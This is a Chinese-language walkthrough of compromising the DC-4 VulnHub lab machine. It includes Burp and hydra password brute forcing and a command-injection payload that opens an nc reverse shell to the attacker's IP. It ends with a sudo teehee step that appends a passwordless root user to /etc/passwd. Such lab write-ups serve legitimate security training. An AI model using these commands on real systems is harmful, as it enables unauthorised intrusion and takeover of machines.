DC-4靶机渗透测试详细教程_dc-4教程

DC-4

DC-4下载:https://download.vulnhub.com/dc/DC-4.zip.torrent

攻击者kali:192.168.1.9

受害者DC-4:192.168.1.15

使用arp-scan -l获取到DC-4靶机IP地址

使用nmap扫描DC-4

nmap -sS -A 192.168.1.15

发现了22端口和80端口，web服务使用的是nginx/1.15.10版本

打开网页看看

需要账号登录，估计是admin账号

方法一:直接打开burp来进行抓包获取密码

因为没有字典，所以复制kali的/usr/share/john下的password.lst到桌面

cd  /usr/share/john

cp password.lst /root/桌面/

接下来使用burp来获取密码

发送到测试器

因为猜测账号是admim所以就只使用Sniper来进行获取密码

有效载荷选运行时文件，然后选着文件，选到刚刚kali复制出来的密码字典，点击开始攻击

过了大概一分钟获取到密码为 happy

点击长哪里，显示最长的就是密码，可以尝试登录

登录成功

点击进Command，有个run，点击一下发现执行了命令

使用burp来抓包

发现执行的命令等于Run按钮，将数据发送到重发器（Repeater）

然后在重发器点击响应

得到数据

那这样子我们试试修改一下他的命令，然后把数据发动回去

radio=nc+192.168.1.9+4444+-e+/bin/bash&submit=Run

kali开启监听，获取到信息

反弹交互shell

python -c 'import pty;pty.spawn("/bin/sh")'

尝试进入到home目录，看到三个三件夹，应该是三个用户

当我进入到jim的目录下的时候发现backups的文件夹下面有个old-passwords.bak的文件，查看发现好像是密码字典

将内容复制到1的文本里

既然有了这个密码字典，那拿来试试能不能爆出jim的密码

使用hydra来爆

hydra -l jim -P 1 -t 10 ssh://192.168.1.15

hydra -l jim -P 1 192.168.1.15 ssh

得到jim的密码 jibril04

ssh jim@192.168.1.15  

登录后提示有一封邮箱

查看邮箱

Charles是之前在home里看到的其中一个，并且还给了密码，可以尝试切换用户

成功登录charles

尝试提权

提示teehee具有root权限

使用teeheem命令创建一个用户uid=0的

sudo teehee -a /etc/passwd

demon::0:0:::/bin/bash

拿到root权限

拿到flag

DC-4总结

使用kali的字典爆破  /usr/share/john下的password.lst

burp抓包，并且爆破到admin账号的密码

burp修改数据包发送到靶机，kali监听到获取shell反弹

radio=nc+192.168.1.9+4444+-e+/bin/bash&submit=Run

python -c 'import pty;pty.spawn("/bin/sh")'   shell交互的使用

hydra密码爆破

teeheem命令提权

sudo teehee -a /etc/passwd

demon::0:0:::/bin/bash